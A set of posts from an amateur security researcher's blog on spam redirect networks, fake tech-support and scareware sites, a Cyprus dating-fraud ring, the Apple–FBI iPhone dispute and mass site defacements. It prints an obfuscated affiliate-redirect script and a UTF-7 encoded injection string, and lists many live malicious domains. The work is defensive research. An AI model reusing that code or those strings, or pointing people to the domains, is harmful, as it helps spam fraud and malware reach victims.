The Return of the Spam Tsunami

As regular readers of this blog know, I am an amateur infosec researcher, and I track spam and malware as a hobby. And, as many of you know, there are certain names–ISPs, people, affiliate networks, content delivery networks–that tend to come up again and again whenever you do a deep dive into the seedy, twisted world of spam and malware.

A while back, I wrote a blog post about a prolific spammer named Mike Boehm, who makes money sending spam emails that advertise affiliate links on affiliate Web sites. Every time someone clicks a link in one of his spam emails, they’re redirected through a network of computers, all designed to put distance between the spam email and the final site, until eventually arriving at an affiliate Web site, which pays Mr. Boehm for the referral.

Lately, I’ve found myself buried under a blizzard–nay, dare I say, a tsunami–of spam emails that all have very similar characteristics. They advertise a site, usually with a cheap top level domain that nobody wants such as .stream or .science or .faith. Visiting the site shows a plain white page with an animated “Loading” graphic. Then, after a few seconds, you end up on a completely different site, the one actually advertised in the spam.

These spam emails have some but not all of the characteristics of Mike Boehm spam. It’s been hard to track them, because they use complex JavaScript to attempt to hide how the redirection works, what affiliate network they’re using, and where they redirect to. I’ve been collecting examples, and as the number of these spam emails arriving in my inbox has risen, so too has my blood pressure.

Today, it finally reached the point where I sat down and did the work to take apart the tricky JavaScript redirectors and figure out what’s happening.

Lo and behold, the JavaScript is used to redirect visitors through Clickbank, a favored affiliate network used by Mike Boehm in the past.

The system works like this:

Basically, the spamvertised site contains hidden iFrames and/or hidden divs that have a redirection JavaScript. The redirection JavaScript attempts to conceal where the page is redirecting to. The code on the Spamvertised pages looks like this:

<script type=”text/javascript” src=”hxxp://[spamvertised domain]/ajax/get_js/main/”></script>
<title>Loading…</title>
<meta hxxp-equiv=”content-type” content=”text/html; charset=UTF-8″ />
</head>
<body>
<div style=”position:absolute;top:-1000px;left:-1000px;height:0px;width:0px;”><a href=”hxxp://www.buzsounds.faith/tr11/6/685/416/510/81/26391725/index.htm” style=”border=0;”><div></div></a></div>
<div id=”show_loading”>
<center><br /><br /><img src=’hxxp://[spamvertised domain]/ajax/get_imgl/loading.gif/’ /></center>
</div>
<div id=”content” style=”display:none;”>
<iframe id=”content_window”>
<html>
<body>
<center><br /><br /><img src=’hxxp://[spamvertised domain]/ajax/get_imgl/loading.gif/’ /></center>
</body>
</html>
</iframe>
</div>
<script type=”text/javascript”>
$(document).ready(
function() {
if (ajax._loaded == false) {
var _doc = ajax.getIframeCW(document.getElementById(‘content_window’));
_doc.body.innerHTML = ‘<html><body><center><br /><br /><img src=\’hxxp://[spamvertised domain]/ajax/get_imgl/loading.gif/\’ /></center></body></html>’;
}
}
);
ajax.getMainPage(
param1,
param2,
param3,
param4,
param5,
param6,
param7,
qs
);
</script>

The JavaScript loaded from the script tag assembles a URL from the parameters, then loads the content of that URL.

getMainPage : function(m,l,li,s,u,o,c) {
var _u = “”;

if (u == ”) {
if (o == ” && c == ”) {
_u = host_name+’ajax_m/get_main_page/’+m+’/’+l+’/’+li+’/’+s+’/’;
}else{
_u = host_name+’ajax_m/get_main_page/’+m+’/’+l+’/’+li+’/’+s+’/’+o+’/’+c+’/’;
}
}else {
if (o == ” && c == ”) {
_u = host_name+’ajax_m/get_main_page/’+m+’/’+l+’/’+li+’/’+s+’/’+u+’/’;
}else{
_u = host_name+’ajax_m/get_main_page/’+m+’/’+l+’/’+li+’/’+s+’/’+u+’/’+o+’/’+c+’/’;
}

}

if(qs != ”) {
_u = _u+”qs/?”+qs;
}

$.ajax({
url: _u,
success: function(data) {

if (pg_st == 0) {
var _w = window;
_w.location = data;
}else{
$(‘#show_loading’).css(‘display’,’block’);
$(‘#content’).css(‘display’,’none’);
var _doc = document.getElementById(‘content_window’);
_doc.src = data;
_doc.onload = ajax.flip;
}
}
});
},

The URL that’s assembled contains nothing but a text string to yet another URL. And, as it turns out, that URL belongs–surprise!–to Clickbank.

In the past, Clickbank has been reasonably responsive to spam complaints. I won’t say they’re great (they’re slow and often don’t take action until I’ve complained multiple times), but they do eventually shut down spamming affiliates.

They shut Mike Boehm down multiple times, and for a while, I was seeing very little spam from him.

This new tsunami of spam, accompanied by the sneaky attempts to conceal the Clickbank redirects, suggests that he’s back to his old tricks, but this time trying to prevent anyone from complaining and having him shut down again.

I’ve managed to find the affiliate IDs he’s using and file complaints with Clickbank. I hope they shut him down again.

There’s a degree of entitlement among spammers I rarely see outside abusers.

Mapping a network of malware sites, and a distressing discovery

Right now, Eve and I are in the remote cabin in the woods where we wrote More Than Two, working on two new books: a nonfiction book called Love More, Be Awesome and a novel called Black Iron.

The cabin has very limited Internet access that’s approximately the same speed as old-fashioned dialup, so fetching email is always a bit dicey. Imagine my disappointment at the timing, then, of a large-scale malware attack.

The emails are all very simple: just two lines and a bit.ly URL shortener address. They come from a wide range of IP addresses with a large number of different forged From: addresses, and they all look exactly the same:

The system behind this email, however, is anything but simple.


The Network

The emails all contain a URL shortening address that uses the popular bit.ly URL shortener service. There’s a complex network behind that short URL, that does a number of different things: promotes dodgy products such as supposed “brain boosting” pills, and attempts to download malware and trick people into phoning phony tech support Web sites that scam victims for hundreds of dollars in fake tech support charges (and also dupe victims into downloading more malware).

*** WARNING *** WARNING *** WARNING ***

All the sites mentioned in this post are live at the time of writing this. Most of them will attempt to download malware or redirect you to sites that attempt to download malware. Do not visit these sites if you don’t know what you’re doing.

When you click the link in one of these emails, you’re redirected via several steps to a site called wholesoil.com that then sends you off to one of many, many possible destinations, some of which are typical run-of-the-mill spam sites and some of which are malware sites. The network looks like this:

This chart is not complete; there are many, many other malware sites that you may be redirected to. I charted well over a dozen more such sites before I quit looking.

Clicking on the link contained in the email enters you into a lottery of suck: Will you get spam? Will you get pwn3d? Hard to say!

I’m not 100% certain it’s entirely random. There may be some element of looking at the browser’s user agent or the visitor’s IP address; visiting wholesoil.com repeatedly in a short span of time will tend to result in getting redirected to the same spam URL over and over after a while.

The people behind this network have gone to considerable lengths to hide themselves. For example, one step of the redirection happens via a domain parking service called tracted.net. The redirection script that relays traffic through this site scrubs the referrer header. When you travel from one Web site to another, your browser sends a “referrer header” that tells the new site where you came from; this is how people can tell where they’re getting traffic from. But this network carefully removes that information, so that the owners of tracted.net can not easily detect this traffic.

The most common spam destination is a subdomain on a site called fastgoodforms.com. These subdomains change often: 570-inteligen.fastgoodforms.com, 324-brain.fastgoodforms.com, 923-inteligen.fastgoodforms.com, and so on.

But more often than spam, users will get redirected to a phony tech support page that displays a fake Windows error message. These sites look like this:

These sites attempt to download malware—specifically, a remote control program that allows attackers to take control of an infected computer. They also attempt to prevent the user’sWeb browser from leaving the site, and display popups over and over and over again telling the user that the computer has been infected by a virus and to call Microsoft Support at a toll-free number.

The toll-free number is owned and operated by the scammers. If you call it, you’re sent to a person in India who will attempt to get your credit card number, and will try to talk you into installing software on your computer to “fix” the “problem.” This software is, of course, remote control malware.


How the mighty fall

While I was tracing out this network, I discovered many, many, many of these fake tech support Web sites that are being used to spread malware and try to con users.

And that’s where I noticed an interesting pattern.

The overwhelming majority of these malware sites are hosted, not on dodgy services in China or the Netherlands as you might normally expect, but on GoDaddy.

Not all of the malware sites are hosted on GoDaddy (I found one hosted on One, one hosted on Hostwinds, and one on IX Web Hosting, for example), but the vast majority—literally dozens—are.

I believe that GoDaddy is the choice of malware hosts because their abuse and security teams, which once upon a time had an excellent reputation in the Web hosting industry, have been pared back to the point they can no longer keep up…or perhaps simply no longer care. (GoDaddy was bought out by an investment group a few years back, which is when its reputation began to decline.)

I reported the Hostwinds-hosted malware site to Hostwinds abuse; it was removed about ten hours later. I reported the malware site on IX Web Hosting; it was gone in 17 minutes. But malware and phish sites on GoDaddy remain, in my experience, for an average of about a month before GoDaddy acts, and spam sites remain essentially forever.

Spammers and malware distributors are adaptable. They move Web hosts often, leaving hosting companies that take rapid action against them and congregating on tolerant sites that permit spam and malware. I suspect the fact that so many malware and fake tech support sites are hosted on GoDaddy is a consequence of the indifference or inability of their abuse and security teams.

To be fair, if you make enough noise, GoDaddy will eventually act. I have engaged with GoDaddy on Twitter, and when I do that, they will generally take down a site I complain about within a few days. The dozens of other sites, however, remain.


I am currently a GoDaddy customer. I do not use GoDaddy for Web hosting, but I do have a large number of domains registered there. I intend to begin removing my domains from GoDaddy, because I do not like supporting spam-tolerant companies. (Ironically, this was the reason I left Namecheap to go to GoDaddy; Namecheap is owned by a company called Rightside, that has become notorious for willingly hosting some of the biggest players in the spam business.)

So if you have a domain registrar you use, please leave a comment! I would love to find a replacement for GoDaddy and pull all my domains away from them. (If you’re using GoDaddy for Web hosting or domains, I advise you to do likewise, unless you fancy staying with a company whose approach to security and malware is so lax.)

I would also like to invite GoDaddy representatives to offer their side of the story in the comments as well.

MacKeeper: The Gift that Keeps On Giving

Stop me if you’ve heard this one before:

A shady, disreputable company makes a dodgy bit of software they claim will protect a computer from malware, but that actually does nothing (at best) or harms your computer (at worst). They sell this software by creating fake Web sites that throw up phony “virus warnings” to visitors pushing the dodgy software, then use a number of devious and underhanded tricks to steer traffic to the fake antivirus pages. They get caught, they find themselves on the receiving end of a class-action lawsuit, and they sell the software to a new company, which promises to clean up its act but which ends up doing exactly the same thing.

If you’re a Mac user, you probably recognize this story. It’s the story of MacKeeper, a bogus bit of software that bills itself as a security and general cleanup app.

MacKeeper is a bit of software with a long and ignoble history. It was originally written by a company called Zeobit, which was so aggressive in marketing the software by shady means that it got hammered with a $2 million settlement in a class action lawsuit. Business Insider magazine has recommended that users stay away from it.

In 2013, a company called Kromtech bought MacKeeper from Zeobit. Kromtech claims to be a German company, but it’s incorporated in the Virgin Islands and all its owners are in the Ukraine. And Kromtech is continuing the practice of pushing the software with phony antivirus sites and fake claims.

The scam works like this:

Booby-trapped ads on legitimate Web sites and redirectors placed on hacked Web sites steer users to fake antivirus pages. These antivirus pages, which live at URLs that look like official Apple URLs, pop up phony warnings of non-existent viruses.

These Web sites attempt to prevent you from leaving, and pop up alert box after alert box warning of a completely phony virus.

When you click on the button to do a “virus scan,” you are shown–surprise!–a report that says your system is infected.

The supposed “tapsnake virus” that this warning talks about is bogus. Tapsnake does not exist; it is a scareware scam used to frighten naive computer and smartphone users into thinking they are infected with a virus.

And, naturally, when you click the “Remove Virus Now” button, you’re taken to…wait for it…

Meet the new MacKeeper owners, same as the old MacKeeper owners.

I’ve seen a considerable uptick in phony antivirus sites trying to con people into buying MacKeeper lately, particularly in the last six weeks.

There is no Tapsnake virus, and your Mac is not infected. It’s a con, designed to sell you a worthless piece of software.

Stay safe out there in cyberspace.

The Lads from Cyprus: Analysis of an Organized Hacking Gang

I get, as readers of this blog will know, a lot of spam. I’ve been using the same email address for decades (my AOL address since 1992, my own domain address since 1996), so I’ve had plenty of time to get on a lot of spam lists.

Recently, I started to see a whole series of very similar spam messages, all variations on the same message (“Hot Lady Wants You to F*ck Her,” “Invited to H00kup”) and all advertising redirectors on hacked Web sites. I’ve received a ton of these spam messages–about 75 in the last three weeks alone, with more coming every day.

The spam messages all spamvertise malicious redirectors that are placed on hacked Web sites. The redirectors all go to a destination that says “This is NOT a dating site! WARNING! You will see nude photos. Please be discreet.”

There’s a lot of hacking activity going on. Every spam message points to a different hacked site, all of which redirect to a whole network of identical landing sites. This, then, is the work of an organized, deliberate hacker or (more likely) group of hackers, likely using automated tools to hack vulnerable Web sites and plant the malicious redirectors.

Curious, I decided to go down the rabbit hole, to see what I could find out. I started collecting the spam emails, tracking how often they came in, what URLs they spamvertised, and where those URLs redirected to.

I discovered an organized gang of hackers and fraudsters operating out of a series of companies organized in Cyprus, who had built a large network of hacked sites and were using the hacked sites to funnel traffic into a fake dating site that attempts to get rather a large amount of money from marks it cons into signing up.

I followed the link from one of the spam messages, a site called hypnotherapyandnlp.co.uk. This site had been hacked to have a redirection script placed on it that redirected me to juicy-hotgirls69.com which in turn redirected me to naughty-juicygirls.com, where I was asked a simple series of questions.

*** WARNING *** WARNING *** WARNING ***

The URLs mentioned in this post are live as of the time of writing this. I recommend you do not visit them if you don’t know what you’re doing. The URLs are compromised sites or sites owned by people who compromise Web sites. They may attempt other malicious actions.

The site naughty-juicygirls-com is registered to an outfit calling itself Tralox Overseas Limited, which lists its business address as

Mitsis Building 1, Stasinou Avenue
Nicosia, Cyprus

I answered the questions and filled out a signup form on naughty-juicygirls-com, and was taken to yet another site, sexmyamateurass.com. This site attempted to get me to enter a credit card number–purely to confirm my age, doncha know. At least that’s what the text on the left side of the Web page claimed. But what the left side giveth, the right side taketh away; text on the right side of the screen told me I’d be signing up for a “VIP membership” that would automatically renew at $49.95 per month.

The site at sexmyamateurass.com is also registered in Cyprus. It is registered to a company calling itself Canderstone Limited, whose address is given as

Peiraios 30, 3016
Limassol, Cyprus

If you are foolish enough to agree to give them a credit card number, totally just for age verification (and recurring membership fees of $49.95 per month), your credit card is sent to a Web site called statusfee.com. This site is also registered to Canderstone Limited in Cyprus.

From there, you’re taken to yet another site, megafuckbook.com. This claims to be a dating site, though as fraudulent dating sites go, it’s pretty transparent. Within fifteen seconds of being redirected to megafuckbook.com I received notification that a woman had sent me an email–which, naturally, I would need to pay money to see.

and ten seconds after that, I got a chat request, supposedly from a woman near me:

megafuckbook.com is registered, unsurprisingly, to Tralox Overseas Limited.

This is par for the course for Web sites that prey on lonely and desperate men. The employees of such sites keep stables of fake profiles, often hundreds of them, and message new users with the intent to entice them to pay for the service. I’ve known folks who’ve worked for such sites.

So, it’s an ordinary and common fraud, atypical only in that the people who own the fraudulent site are aggressive computer hackers who compromise large numbers of sites and ten send out barrages of spam containing links to redirectors on the hacked sites.

I took a look at the Web host responsible for megafuckbook.com. It’s hosted on a Web hosting company called RackCo. RackCo looks to be a Virginia company that’s basically Yet Another Managed Hosting Provider, nothing particularly interesting about them. However, a quick check at Spamcop did turn up something interesting: Rackco is specifically not interested in hearing complaints about megafuckbook.com.

So what’s happened is a group of folks operating out of Cyprus are running aphony, and very expensive, dating Web site. They are aggressively hacking large numbers of other sites, which they use as a redirection network. They spam their redirection network to funnel people into the fake dating site. The ISP hosting the fake dating site has explicitly said it refuses to hear spam complaints regarding the fake dating site.

The overall system looks like this:

So this is a group of sleazy operators in the sleazy fake dating sphere, who have crossed over from sleazy to outright criminal activity in using hacking to compromise Web sites and enlist them as traffic redirectors.

People often ask me, “what’s the big deal if I don’t stay on top of security for my little WordPress site? There’s nothing on it. I only get three visitors a month, and one of them is my mom. Why would anyone want to hack me?”

The answer is “people don’t hack you to get whatever’s on your site. They hack you so they can use your site for their own purposes–placing illegal content on your site, hosting phish pages on your site, planting malware on your site, putting redirectors on your site which they can then use in spam campaigns. It’s not about you. Obscurity doesn’t matter.”

Secure your Web sites. If you have a presence on the Web, it’s on you to prevent operators like these from hijacking you.

I have reached out to Rackco to see if they’re willing to explain why they host this site and refuse to accept spam reports about it. I’ll update this blog post if I get a reply.

Apple vs the FBI: Whoever wins, it’s a mess

Apple and the FBI. It’s the Rock ‘Em Sock ‘Em Robots fight that the movie Alien vs Predator should have been, but unlike Alien vs Predator, this one so far has failed to disappoint.

On one side, we have a giant tech megacorp that makes cellphones. Also other stuff, I hear, but these days mostly cellphones. On the other, we have the full force and might of the United States Government, in the form of the Federal Bureau of Investigation. In between, we have: Terrorists! Encryption! Civil liberties! Donald Trump spouting off!

The Internet is filled with conversations about the spat, much of which are either not technically correct or overtly technical. It’s my goal here to try to explain a very complex situation in a way that doesn’t require a high level of technical mastery. However, this is a technical issue, so there will be some geeky bits.


The Background

Last year, a couple of assholes named Syed Rizwan Farook and Tashfeen Malik decided they were going to express religion of peace by blowing away a bunch of people in San Bernardino, California. They decided, you see, that something something holy war something martyr God, and something something kill people whatever…I don’t know or particularly care about the details, and they’re not really relevant here. So far, so boring: some yahoos think there’s an invisible dude in the sky who wants them to kill some other people, it all ends in tears–a story that’s been playing out with minor unimportant variations since the dawn of civilization. The FBI investigated and decided they were “homegrown extremists” (no idea if they were organic or GMO-free) and not affiliated with any other terrorist groups or cells.

This is the part where things get interesting.

During the investigation, the FBI discovered that the yahoos had Android smartphones, which they destroyed prior to going on their rampage of murderous idiocy, and that one of them had an iPhone 5C provided by the company he worked for.

This is the logic board from an iPhone 5c. Like all iPhones, the user data on an iPhone 5c is encrypted. You need to unlock the phone in order to get at its contents. By default, the phone is locked with a 4-digit numeric code. If you don’t enter the code, the phone’s contents remain encrypted.

You can’t just read the information from the phone’s flash memory, because it’s encrypted. The FBI wants to read the contents of the phone, for reasons that aren’t clear to me (if there was anything sensitive on it, it’s hard to imagine he wouldn’t have smashed the phone before running off to kill people who had nothing to do with whatever grudge he imagined his invisible sky-man carried, like he did with his other phones), but whatever.

The FBI tried to read the phone’s contents, and discovered that the iPhone is actually rather secure. If you want to know the full details of how secure, there’s a PDF on Apple’s iPhone security here.

So they went to Apple.

This is where things get really interesting, and a lot of the conversation about the situation gets some important facts wrong.


The Problem

The iPhone’s files and such are encrypted. This is not simple home-grown encryption, either; it’s military-grade 256-bit AES encryption. It can not be defeated by any known attack. All the world’s computers combined would take about a billion years to brute-force the encryption, which is a bit more time than the FBI prefers to spend on this.

Now, there are some important things to understand here.

One is that nobody can break the encryption, not even Apple. Apple has no secret back doors or master passkeys to get at the contents of a locked phone, and that’s not (exactly) what the FBI is asking them to do.

The other is that the four-digit code you type into an iPhone is not the encryption key. The encryption key is made up of a secret, random number embedded into each phone at the moment of manufacture, combined with the passcode you set by means of some arcane mathematics that are beyond the scope of this blog post. Apple does not know the encryption key; they do not have a way to set the unique hardware number, and in any event it’s all tangled up with the passcode the user enters in order to create the encryption key anyway.

So here’s where things sit: The phone’s contents are encrypted. The FBI wants access to the phone for whatever reason. Apple can’t decrypt the phone. So what’s the deal?


The Tussle

The fact that the phone in question is an iPhone 5c is really, really important. If it had been a 5S or a 6, it wouldn’t matter, because Apple made a change in the inner workings of the later phones to prevent it from being asked to do precisely what it’s being asked to do.

So, here’s how it works.

iPhones run an operating system called iOS. iOS is digitally signed; that means Apple has a secret encryption key it embeds into iOS. The phone carries a special, immutable boot ROM that contains the decryption code for this key. If it starts to boot and sees an operating system not signed by Apple, or if the operating system is tampered with in any way, the phone refuses to boot. (This is different from and not related to jailbreaking an iPhone. Even a jailbroken phone will not boot a copy of iOS not signed by Apple.)

What does that mean? It means nobody on earth–literally–can make an operating system the phone will boot, except for Apple. If the FBI or anyone else tries to modify the iOS boot loader, the phone will not boot. Only Apple knows the key needed to change the iOS boot loader.

Now, a few other things you need to know about how an iPhone works.

If you type the wrong passcode into an iPhone, the phone lets you try again. If you get it wrong again, the phone lets you try again, but after that, things start getting harder. The phone starts introducing a delay before you can try again. That delay gets longer and longer the more you enter the wrong code. By the ninth time you enter the wrong code, the phone refuses to allow you to try again until an hour has passed.

There are 10,000 different possible combinations of four digits. If you can only try one per hour, it will take you more than a year to try them all. Good luck trying to brute force the passcode!

There’s another complication too. If you get it wrong 10 times, the phone wipes itself.

Here’s where the 5c thing gets important.

Starting with the iPhone 5S, Apple introduced the “Secure Enclave.” The Secure Enclave is a special chip (well, actually, it’s a special section of the processor chip) that has its own memory. It’s basically a tiny, highly secure, tamper-resistant computer.

The Secure Enclave keeps the phone’s decryption key in its own special memory and talks to the phone over a special-purposes, encrypted communication link. The rest of the phone does not know, or have access to, any information stored in the Secure Enclave.

When you enter the passcode, the phone sends the passcode to the Secure Enclave. The Secure Enclave says “yes” or “no” about whether the right code was entered. If the right code was entered, the Secure Enclave decrypts the phone. If it wasn’t, the Secure Enclave refuses to do so. It also starts a timer. While the timer is running, the Secure Enclave refuses to process any more passcode requests. That timer runs for longer and longer as you keep entering the wrong code. If you enter the wrong code 10 times, the Secure Enclave wipes the encryption key from its own memory and that’s it, you’re done. Trying to get at the phone’s contents after that means you’ll be banging away at it until the stars burn out.

But… This is not an iPhone 5S or later, it’s a 5c!

On the 5c, the time delay and wiping the phone are not handled by the Secure Enclave, they’re handled by the operating system. The operating system enforces the longer and longer delay and the operating system wipes the phone if you enter the wrong code 10 times.

The Secure Enclave is a bit of hardware that can’t be tampered with. But the operating system can be changed. So if you have an older iPhone, you could, in theory, put a different version of iOS on it. A special version, with the timer and the phone wipe disabled.

Except, oh no you can’t, because the phone will not run an operating system that isn’t signed by Apple.

So the FBI wants Apple to create a new version of iOS. A modified version that has no time delay if you get a wrong passcode and no phone wipe. And then they want Apple to sign it and put that new version of iOS onto the phone.

This will not give them the contents of the phone. What it will do is let them try passcode after passcode as fast as possible until they break in. Without a phone wipe, they can keep trying as many times as it takes. Without a delay, they can try all 10,000 combinations in days or weeks instead of years.

Of course, there’s an added wrinkle to all this. The FBI already has a copy of the phone’s data.

iPhones come with a subscription to Apple’s cloud service, iCloud. iPhone users can choose to have their data backed up to iCloud. The backup feature was turned on on this phone. The FBI asked for, and got, a copy of the phone’s data backed up on iCloud.

Unfortunately, the copy they got is out of date. They screwed up and asked the company that owns the phone to change the iCloud password in order to have a look at what was there. The company complied. The FBI looked at the iCloud backup. Then they turned on the iPhone. The iPhone couldn’t make a new backup to the cloud…because the password had been changed. The FBI thinks it’s possible there’s information on the phone that’s newer than the information in the cloud backup. They’re not sure, though, because…they can’t get into the phone.


The Rationalization

If an iPhone were a safety deposit box and Apple had the key, the government would normally just issue a subpoena for Apple to produce the key, assuming they didn’t just take a blowtorch to the box and be done with it.

But that’s not what the government has done here. They can’t subpoena Apple to produce the encryption key or the passcode because Apple does not have and can not get the encryption key or the passcode, and Apple has no magic backdoor.

So instead, they’ve turned to the All Writs Act of 1789, a law signed by this dude.

The All Writs Act is a law that allows the government to issue “all writs necessary or appropriate in aid of their respective jurisdictions and agreeable to the usages and principles of law.” Essentially, it lets Federal courts issue orders to private citizens in order to accomplish legal ends. A writ was originally a written order given by a monarch to a citizen compelling the citizen to do something. The way it’s used in the All Writs Act, it’s an order from a court compelling a citizen to do something.

Like, for example, write a new operating system. Because the court says so.

The All Writs Act was signed into law before the Bill of Rights existed. The Bill of Rights would seem to put some limits, at least, on what the government can order people to do. In this case, the FBI thinks that ordering a company to write a piece of software is within those limits.

It should be noted that this isn’t a matter of commenting out a few lines of code and hitting “compile.” There are, for good reason, legal guidelines that must be followed when writing investigatory forensic software. These legal guidelines are necessary to preserve the chain of evidence and show in court that the software didn’t modify the information on the device being investigated. The standards are fairly complex and are outlined on this page on the Digital Forensic Investigator Web site.

Basically, the gist of it is the software must be documented, must be subject to peer review, must be tested on target devices similar to the device being investigated to show that it works and won’t corrupt, delete, or modify information, and must pass independent judicial review of its reliability.

So basically, the FBI is asking Apple to go to considerable trouble to build a new operating system, test it, document it, submit it for examination, and load it onto an iPhone 5c, for the purpose of allowing the FBI to keep trying all 10,000 possible passcodes until they finally unlock it. They’re using a law written before the Bill of Rights existed that authorizes Federal courts to issue orders to private citizens to do this. Basically, the All Writs Act says “the government can order people to do any legal thing.” It has zero to say on the subject of what constitutes a “legal thing.”


The Real Battle

The FBI wants Apple to create a new version of its operating system, with certain key security features disabled, and load it onto the phone so that its passcode can be brute-force hacked and the contents read. They’re not asking Apple to decrypt the phone; Apple can’t do that. They’re not asking Apple to provide the passcode; Apple can’t do that either. They’re asking for a new operating system.

Would this new operating system allow them to get at any locked phone? No, it would not. iPhone 5s and later models have these security features in hardware, etched in silicon on the Secure Enclave. A new operating system can’t change that.

So what’s the big deal? Is Apple coddling terrorists, like the FBI director implies and Donald Trump spouts all over Twitter from his iPhone?

No. As with an argument between two lovers that ultimately ends in divorce, this fight is’t really about the stuff this fight is about. This fight isn’t about a work phone that used to belong to a terrorist asshole and probably contains fuckall of interest to the FBI. The terrorism angle is a convenient excuse, because the word “terrorism” is kind of magic spell that causes a whole lot of people (including, bizarrely, conservatives whose entire political philosophy is built on the foundation of distrusting the government) to take leave of their senses and do whatever they’re told.

But this fight isn’t about this phone.

Washington is afraid of encryption. Much as gun lovers and survivalists love to think Washington is afraid of their guns (which is laughable in its absurdity–the military has way more guns than you do, Tex), Washington is afraid of encryption.

This fight has been a very long time coming. The government has always hated and feared encryption, even as it has invested tremendous resources in making encryption better.

In the early 90s, the US passed laws banning export of encryption products. I still own a T-shirt that was legally classified as a “munition” back then, and that you could be arrested on Federal charges for wearing outside the US or showing to foreign nationals, because it’s printed with source code for encryption software. Finally, in 1996, Bill Clinton scrapped laws against exporting encryption software, largely because they were hurting US businesses overseas, and besides, the Russians already had strong crypto because–surprise!–they had mathematicians too.

The fear of the Russkies has faded into nothing–there’s an entire generation now old enough to read this blog post that grew up with the Cold War being something you read about in history books, not something you lived through. Now, the bogeyman du jour is terrorists, or maybe pedophiles, or hell, why not both?

Police don’t like locked phones and encrypted comms, and Congress has been wrestling with what to do about that for years.

The government has mulled banning strong encryption. Not just the US government, but every government. China wants to ban it. France just debated banning it. India is planning to ban it. The UK wants to ban it. Congress has considered banning it no fewer than three times in the last two years.

The arguments are always always the same: If people can talk without the government listening, the terrorists win. Or the pedophiles win. Or the pedophile terrorists win. Law enforcement can’t do its job without being able to see what’s on your smartphone, because reasons.

Apple argues that if the government succeeds in ordering it to write a new version of iOS to help them get onto this phone, they will feel free to order it to write other software for them as well. Write us software to let us turn on this suspect’s cell phone camera and microphone remotely! Write us software to make copies of this suspect’s email! No legal principle exists that would limit the authority of the government’s ability to order Apple to do things like this.

And that’s a nice, cuddly government filled with the milk of human kindness, like the US government believes the US government is. If Apple has the ability to do these things and can be compelled to do so, the Chinese will really like that. Apple argues that if the FBI succeeds, it will basically have to create a whole new software department–call it the Department of Undermining Our Security Department–to handle the flood of orders coming in to write custom software to disable this or that or the other security feature. And they might be right.

The government says nobody else will get this hacked iOS version (or versions, if other requests start rolling in). Apple says that’s naive. Hard to say what’s scarier, the FBI with rogue Apple-signed iOS software, the Chinese with rogue Apple-signed iOS software, or rogue Apple-signed iOS software leaking into the hands of organized crime.

There’s also the very real possibility that if the government has success here, sooner or later it will realize that a terrorist using an iPhone 6 will still be able to secure a phone in a way that neither Apple nor the government can do anything about, and start calling on Apple (and other companies) to weaken their encryption. The Secure Enclave with its hardware timer and self-vaporizing key is pretty damn secure. What happens if the government decides to tell Apple to tone things down a bit for the iPhone 7? That’s not impossible, and if Apple can be forced to write a new operating system to help law enforcement, changing the design of their chips to help law enforcement is a doddle.

Encryption is math. Math is math; math doesn’t care about bad guys or good guys or legal oversight. If there is a way to slip past an encryption method, that way works for everyone, good guys and bad guys alike, because math is math and math doesn’t care. If it works for the FBI, it works for Igor in the Russian mafia as well.

So that’s what’s going on, and that’s what’s at stake. It’s a problem that doesn’t readily boil down to sound bites or Tweets, and that means, I fear, that the public won’t really understand what’s happening until it’s been decided for them.

ISIS, WordPress, and insecure Web hosts, oh my!

It is a fact universally acknowledged that running a WordPress site is a dangerous thing to do. WordPress is often attacked by hackers, because so many sites run it and so many people are not good about installing security updates. The hackers will use the commandeered sites for all sorts of nefarious purposes: installing malware, hosting phony bank pages that they then spamvertise in “Update Your Account Now” spam emails, hosting redirectors that lead people to spam or porn or phish pages.

I get a lot of spam emails, and when they lead to phony bank pages I will often check the top level of the site that the phony bank page is hosted on to see what’s going on. As often as not, the phony bank page is living on a WordPress site whose owner chose a bad password or was negligent about updating, and got pwn3d.

So it was that I found a fake PayPal page and, when I checked the home page of the hijacked site it lived on, I saw something odd: the home page had been deleted and replaced with a message reading “HACKED BY DARKSHADOW-TN AND ANONCODERS”.

I didn’t realize I was about to stumble on a massive (and still ongoing) security breach at two large Web hosting companies, Arvixe and Eleven2.

   

Curious, I did a Google search for that phrase (hacked by darkshadow-tn and anoncoders) and found thousands of Web sites that had been hacked and defaced with that message. And I do mean thousands–nearly three thousand in all.

I started working through the Google list, visiting each Web site to see if the defacement was still present. I discovered that there were three basic types of defacement, almost all of them done to WordPress sites.

Some sites had their content removed and replaced with a simple text message.

Some had the content left alone, but the page title changed to read “+ADw-/title+AD4-HACKED BY DARKSHADOW-TN AND ANONCODERS+ADw-DIV style+AD0AIg-DISPLAY: none+ACIAPgA8-xmp+AD4-“. This appears to be a misconfiguration of the automated tools the hackers used to deface the sites; it seems the hackers were trying to insert this in the page’s body.

Some had a defacement message injected into the body of the Web site, usually at the top.

So, who are Darkshadow and Anoncoders?

Anoncoders is a loosely-organized group of Islamic computer hackers who use automated tools to hack poorly secured Web sites and deface them with anti-Israeli and pro-Muslim messages. They even have a Facebook page and everything.

Darkshadow is a group of pro-ISIS Muslim extremists who, like Anoncoders, often hack sites to deface them with pro-ISIS, anti-Israel, and/or anti-Western messages. They used to have a Facebook page, but it’s gone as of the time of writing this.

So we’ve got a couple of pro-Muslim, anti-Western hacker groups who generally use automated tools to hack low-lying fruit, such as WordPress and Drupal sites that are running old versions or otherwise poorly secured. So far, so ordinary–dare I say, even boring. These kinds of attacks are a dime a dozen.

I started making a list of hacked sites, checking who the Web host was, then sending emails to the Web host abuse address letting them know they were hosting hacked sites.

That was when things got interesting.

As I went through the results of the Google search, cataloging thousands of hacked sites, I started noticing something weird: all the hacked sites were on only two hosting companies. Roughly half of them were hosted by Arvixe, and the other half were hosted by Eleven2, an outfit that’s a subsidiary of a company called IH Networks.

That raised the possibility that this wasn’t merely an automated, script-kiddie attack against a bunch of low-hanging fruit, but a breach of two hosting company’s Web control panel software or some other weak link in the hosting companies’ software infrastructure.

I sent off emails to both Web hosts letting them know they had been the subject of a massive breach.

Unsurprisingly, neither of them responded. I say “unsurprisingly” because I have a long history of discovering massive security breaches at large, popular Web hosting companies that go unrepaired for months or even years.

I sent notifications to both of those Web hosting companies about three weeks ago. Upon re-examining the hacked sites today, I discovered, disappointingly, that the security problems have not been fixed and the sites remain compromised.

So I went back and looked at past abuse reports I have filed with those companies. This is my first contact with Eleven2, but I noticed that hacked sites I had alerted Arvixe to as long ago as last September are still compromised.

It seems there is a lesson here: Both Arvixe and Eleven2 have severe ongoing security problems and are more or less completely indifferent to fixing the problem.

